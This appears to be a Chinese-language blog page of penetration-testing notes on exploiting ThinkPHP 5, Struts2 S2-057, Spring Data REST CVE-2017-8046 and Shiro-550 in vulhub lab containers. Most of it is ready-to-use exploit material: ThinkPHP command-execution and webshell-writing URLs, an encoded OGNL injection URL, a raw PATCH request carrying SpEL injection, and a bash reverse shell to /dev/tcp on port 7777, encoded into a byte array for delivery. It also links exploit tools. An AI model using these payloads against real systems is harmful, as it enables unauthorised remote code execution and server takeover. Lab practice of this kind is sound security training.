框架&中间件&CMS
Thinkphp
Thinkphp5x远程命令执行及getshell
靶场:vulhub/thinkphp/5-rce
下载docker apt install docker-compose
docker version 查看docker的版本信息 docker images 查看拥有的images docker ps 查看docker container
下载编译vulhub靶机 git clone https://github.com/vulhub/vulhub.git
进入目录 /root/vulhub/thinkphp/5-rce
启动环境 docker-compose up -d
docker-compose build docker ps -a 查看容器 docker stop d1fed24ff35e 停止容器 docker-compose up -d 启动环境
浏览器访问 http://192.168.1.199:8080/index.php
远程命令执行
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
远程代码执行
POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
getshell
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "" >>1.php
根目录生成1.php 文件,输出phpinfo 访问192.168.1.199/1.php
struts2
S2-057远程执行代码漏洞
kali vulhub靶场 /struts2/s2-057
docker-compose up -d
访问 http://192.168.1.199:8080/struts2-showcase
在url处输入 http://192.168.1.199:8080/struts2-showcase/${(123+123)}/actionChain1.action
后刷新可以看到中间数字位置相加了。
刷新界面抓包——转发到repeater
246换成
http://192.168.1.199:8080/struts2-showcase/%24%7B%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action
把action/register2删掉——GO
id换成whoami
Spring
Spring Data Rest 远程命令执行命令(CVE-2017-8046)
环境
kali vulhub靶场 /spring/CVE-2017-8046
fofa:icon_hash="116323821"
漏洞简介
Spring Data 是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有子项目共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在一处 SpEL 表达式注入漏洞,攻击者可以注入恶意 SpEL 表达式以执行任意命令。
影响版本
Spring Data Commons 1.13 – 1.13.10 (Ingalls SR10) Spring Data REST 2.6 – 2.6.10(Ingalls SR10) Spring Data Commons 2.0 – 2.0.5 (Kay SR5) Spring Data REST 3.0 – 3.0.5(Kay SR5) 官方已经不支持的旧版本
访问http://192.168.1.37:8080/login
http://192.168.1.37:8080/customers/1 抓包修改
GET改为PATCH
添加Content-Type: application/json-patch+json
添加[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
PATCH /customers/1 HTTP/1.1
Host: 192.168.1.37:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/json-patch+json
Cookie: JSESSIONID=D81A37ACC5D0088A5F1F0966A251B92F
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Mar 2022 08:32:07 GMT
If-None-Match: "0"
Cache-Control: max-age=0
Content-Length: 200
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
修改一下需要执行的反弹shell的命令:bash -i >& /dev/tcp/192.168.1.37/7777 0>&1
在以下网站进行编码 https://jackson-t.ca/runtime-exec-payloads.html
结果为:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNzc3NyAwPiYxCg==}|{base64,-d}|{bash,-i}
然后再转ascii,终端打开python
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
结果为
98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,117,77,122,99,118,78,122,99,51,78,121,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125
下面使用payload进行测试,照常理,我们需要先在自己的服务器开启监听,然后再发送payload:
nc -lvp 7777
发送如下payload,其中,exec后面执行的编码替换为你生成的ascii命令
Shiro
恶意命令-->序列化-->AES加密-->base64编码-->发送Cookie
Shiro漏洞指纹
响应包中存在字段set-Cookie: rememberMe=deleteMe
Shiro rememberMe反序列化漏洞(Shiro-550)
漏洞原理
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
影响版本
Apache Shiro < 1.2.4
环境
kali vulhub靶场 /shiro/CVE-2016-4437
抓包,转发repeater
Burp Shiro 漏洞检测插件
BurpShiroPassiveScan:https://github.com/pmiaowu/BurpShiroPassiveScan/releases/tag/BurpShiroPassiveScan-1.7.6
在BurpSuite的扩展(Extend)中安装并启动Shiro检测插件
重新抓包
当BurpSuite抓取到Shiro的数据包时会自动进行检测Key,当发现存在Shiro默认key时会有相应的告警
命令执行
利用工具,命令执行:
shiro_attack_2.2工具:https://github.com/j1anFen/shiro_attack/releases/tag/2.2
反弹shell
工具:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51
反弹shell,ubuntu开启nc监听:
再次Fire
浙公网安备 33010602011771号